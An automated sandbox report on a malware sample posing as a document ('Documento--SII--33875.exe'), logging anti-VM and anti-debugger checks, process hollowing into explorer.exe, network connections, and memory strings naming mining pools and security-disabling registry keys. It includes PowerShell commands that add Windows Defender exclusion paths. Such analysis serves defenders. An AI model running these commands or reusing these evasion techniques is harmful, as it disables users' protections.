                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6408Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6392Thread sleep count: 704 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6392Thread sleep time: -42240s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6456Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6416Thread sleep count: 697 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6416Thread sleep time: -41820s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6532Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6460Thread sleep count: 689 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6460Thread sleep time: -41340s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6632Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6588Thread sleep time: -40260s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6724Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6672Thread sleep count: 658 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6672Thread sleep time: -39480s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6956Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6852Thread sleep count: 650 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 6852Thread sleep time: -39000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7120Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7032Thread sleep count: 635 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7032Thread sleep time: -38100s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 980Thread sleep time: -660000s >= -30000s
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7140Thread sleep count: 621 > 30
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe TID: 7140Thread sleep time: -37260s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6760Thread sleep count: 5772 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5380Thread sleep count: 476 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4320Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6360Thread sleep count: 6849 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6056Thread sleep count: 508 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4564Thread sleep time: -17524406870024063s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_00429762 GetSystemInfo,
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266245612.0000000000769000.00000004.00000020.sdmpBinary or memory string: \\.\HGFSl(
                      Source: 9sek3aw7533q9.exe, 00000015.00000002.281169894.0000000000730000.00000004.00000020.sdmpBinary or memory string: \??\HGFS
                      Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: Software\VMware, Inc.
                      Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: Starttooltips_class32%c:\usb20.sys%c:\*pp.exe%c:\%s%c:\pp.exe.lnk%WinDir%\explorer.exe /C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnk{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}VisthAux.exesnxhk.dllSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Classes\originjagexcacheSOFTWARE\Blizzard Entertainment.minecraftLeague of LegendsSoftware\SkypeSoftware\Microsoft\VisualStudioSoftware\VMware, Inc.SOFTWARE\AdwCleanerSOFTWARE\Safer Networking Limited\Spybot - Search & Destroy 2Software\Classes\VirtualStore\MACHINE\SOFTWARE\TrendMicro\HijackThisComboFixLinhaDefensivaHouseCallLanguageSoftware\Valve\SteamMRU0Software\Microsoft\Terminal Server Client\Default%08x:\nortonsymantecsecurityantivirustest_uac_1.exesetup.exerunonce.exe__restartWmiPrvSE.execomctl32.dllGetAddrInfoWGetAddrInfoExWwintrust.dllWinVerifyTrustNtOpenProcessNtCreateFileNtOpenFileNtSetValueKeyNtDeleteValueKeySOFTWARESYSTEM\CurrentControlSet\servicesEnableLUASOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Systemcmd.exe /c start "" "%s" "" DisableSRSOFTWARE\Policies\Microsoft\Windows NT\SystemRestoremrtstub.exe"%s"VersionCheckEnabledSoftware\Microsoft\Windows\CurrentVersion\Policies\ExtEnableJavaUpdateSOFTWARE\JavaSoft\Java Update\PolicySOFTWARE\Wow6432Node\JavaSoft\Java Update\PolicyiCheckReaderSOFTWARE\Adobe\Adobe ARM\1.0\ARMSOFTWARE\Wow6432Node\Adobe\Adobe ARM\1.0\ARMDisableWindowsUpdateAccessSoftware\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdateEnableBalloonTipsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedEnableSmartScreenSOFTWARE\Policies\Microsoft\Windows\SystemSmartScreenEnabledSOFTWARE\Microsoft\Windows\CurrentVersion\ExplorerOff%S\%S\%S\%pgoogle.comwindowsupdate.microsoft.commicrosoft.comupdate.microsoft.comwinmgr108.exemsiexec.exewuauclt.exesvchost.exestratum-ubtcguildpool.itzod.rubitcoinpool.compool0.btcdig.comtriplemining.com.bitparking.commining.eligius.st.bitcoin.czmint.bitminter.compool_addresstcp://-pscryptsha256solid-a http-t @-x socks=wscript.execscript.exevbc.exerundll32.exeregsvr32.exe%ALLUSERSPROFILE%SOFTWARE\Microsoft\CurrentVersion\RunSOFTWARE\Microsoft\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSystemcsrss.exelsass.exesmss.exewinlogon.exeservices.exekernel32.dll.ini.sys%s\%08x.lnk\regsvr32.exe\rundll32.exe\wscript.exe\cscript.exewscript.exe / cscript.exe wscript ~explorer.exedesktop.ini javascript:\mshtml,<script>%08xSOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsLoadWinlogonSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon ,{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}{2faba4c7-4da9-4013-9697-20cc3fd40f85}\CLSID\%S\InprocServer32Wow6432Node\CLSID\%S\InprocServer32Software\Microsoft\Windows\CurrentVersion\Ext\SettingsP: %u // RPE: %u // T: %u // F: %u // MNR: %u // AS: %u // BHO: %u // // vAntiBot() :: Abruptly exited due to update task%s%s_%p%08x%08x%08x%08xSoftware\AppDataLow\Software\%s\%08XSoftware\AppDataLow\Software\%s\%08X\%s.rdatachrome.dllPOSTposthttpHTTP
                      Source: 9sek3aw7533q9.exe, 00000015.00000002.281151249.0000000000723000.00000004.00000020.sdmpBinary or memory string: \??\VBoxGuestq
                      Source: 9sek3aw7533q9.exe, 00000020.00000002.299241171.00000000008C0000.00000040.00000001.sdmpBinary or memory string: SbieDll.dllapi_log.dlldir_watch.dll%02XEVERYONECURRENT_USER0x%08XSB:0x%08XG:%s_0x%08X_%c:%s_v1$G:%S_0x%08XOPENmscoree.dllSoftware\Microsoft\Internet Explorer\MainSoftware\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u2500IsolationPMILNoProtectedModeBanneryesCheck_AssociationsSOFTWARE\Microsoft\Internet Explorer\MainIEXPLORE.EXESOFTWARE\Clients\StartMenuInternetIE.HTTPProgidSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoiceIE.HTTPSSOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoiceSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoiceIE.AssocFile.HTMchrome.exefirefox.exeopera.exesafari.exe360browser.exemaxthon.exesvcVersionSOFTWARE\Microsoft\Internet ExplorerVersionCurrentVersionSoftware\Mozilla\Mozilla FirefoxHTTP\shell\open\commandStart PageApplications\iexplore.exe\shell\open\commandiex(x86)%s\Internet Explorer\iexplore.exeSoftware\Microsoft\Windows\CurrentVersion\Ext\Settings\%sFlagscookie:Mozilla\Firefox\Profilescookies.sqliteErp~dcen7Zxy~cxe7:7Dnd~ycreyv{d-7```9dnd~ycreyv{d9txzX[[NSUPDxqc`verK^zzby~cn7^ytPZREZxy~cxe~yp7:7VG^7Zxy~cxe7a%7$%:u~cGEXTZXYH@^YSX@HT[VDDC^sv@~ysx`DNDCRZKTxycex{Drc''&Kdrea~trdKS~d|KRybzaz`verauxoDNDCRZKTbeerycTxycex{DrcKdrea~trdKAZ`verDXQC@VERKAZ`ver;7^yt90Libraryindotaskmgr.exeprocexp.exe\DesktopDocuments%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*%s\winsxs\%s\comctl32.dllK32GetMappedFileNameWPsapi.dllGetMappedFileNameWSystemManufacturerHARDWARE\DESCRIPTION\System\BIOSvMwARSystemBiosVersionHARDWARE\DESCRIPTION\SystemvBoXdriversvboxvideo.sysvboxguest.sysvmhgfs.sysprl_boot.sysJJ8J^QPEJJ8J@TynQcsebcmd.exeProcessorNameStringHARDWARE\DESCRIPTION\System\CentralProcessor\0dg_ssudbusApple Mobile DeviceSOFTWARE\Microsoft\Windows NT\CurrentVersion%s\%sdeployment.security.level=MEDIUM
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266268374.0000000000783000.00000004.00000020.sdmpBinary or memory string: \??\VBoxGuests8
                      Source: CpSHySoEfzH.exeBinary or memory string: vmhgfs.sys
                      Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: CpSHySoEfzH.exeBinary or memory string: vboxguest.sys
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266268374.0000000000783000.00000004.00000020.sdmpBinary or memory string: \\.\VBoxGuest
                      Source: 9sek3aw7533q9.exe, 00000015.00000002.281151249.0000000000723000.00000004.00000020.sdmpBinary or memory string: \\.\VBoxGuestK
                      Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266278280.0000000000790000.00000004.00000020.sdmpBinary or memory string: \??\HGFS%3o
                      Source: 9sek3aw7533q9.exe, 00000015.00000002.281122874.0000000000709000.00000004.00000020.sdmpBinary or memory string: \\.\HGFSl]
                      Source: 9sek3aw7533q9.exe, 0000000E.00000002.266278280.0000000000790000.00000004.00000020.sdmp, 9sek3aw7533q9.exe, 00000015.00000002.281169894.0000000000730000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000025.00000002.359390441.00000248FFB60000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Windows\SysWOW64\explorer.exeProcess information queried: ProcessInformation

                      Anti Debugging:

                      barindex
                      Hides threads from debuggers
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeThread information set: HideFromDebugger
                      Source: C:\Windows\SysWOW64\explorer.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeThread information set: HideFromDebugger
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeThread information set: HideFromDebugger
                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: procmon_window_class
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: tidawindow
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: monitoring - api monitor v2 32-bit
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeProcess queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess queried: DebugPort
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_2_027E2AFC LdrInitializeThunk,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_00468B80 InterlockedIncrement,LoadLibraryA,GetProcAddress,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,WriteFile,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_2_004015C6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_2_004015C6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_2_00401BC1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_1_004015C6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_1_004015C6 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_1_00401BC1 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_0042935C GetProcessHeap,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\explorer.exeProcess token adjusted: Debug
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess token adjusted: Debug
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess token adjusted: Debug
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_2_004015C6 EntryPoint,SetErrorMode,SetUnhandledExceptionFilter,GetModuleFileNameW,WaitForSingleObjectEx,ExitProcess,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 2_1_004015C6 EntryPoint,SetErrorMode,SetUnhandledExceptionFilter,GetModuleFileNameW,WaitForSingleObjectEx,ExitProcess,

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 8.210.47.214 80
                      Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 104.21.55.228 187
                      Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 212.114.52.43 80
                      Adds a directory exclusion to Windows Defender
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Contains functionality to inject code into remote processes
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: 11_2_0043D9E7 GetProcAddress,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,GetProcessHeap,RtlAllocateHeap,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,GetCommandLineA,CreateProcessA,GetProcAddress,GetProcAddress,GetModuleFileNameA,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,_hread,ResumeThread,GetCurrentProcess,VirtualAllocEx,GetProcessHeap,HeapAlloc,GetProcAddress,
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeMemory written: C:\Users\user\Desktop\Documento--SII--33875.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeMemory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeMemory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeMemory written: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe base: 400000 value starts with: 4D5A
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exe protection: execute and read and write
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Sample uses process hollowing technique
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: E0000
                      Writes to foreign memory regions
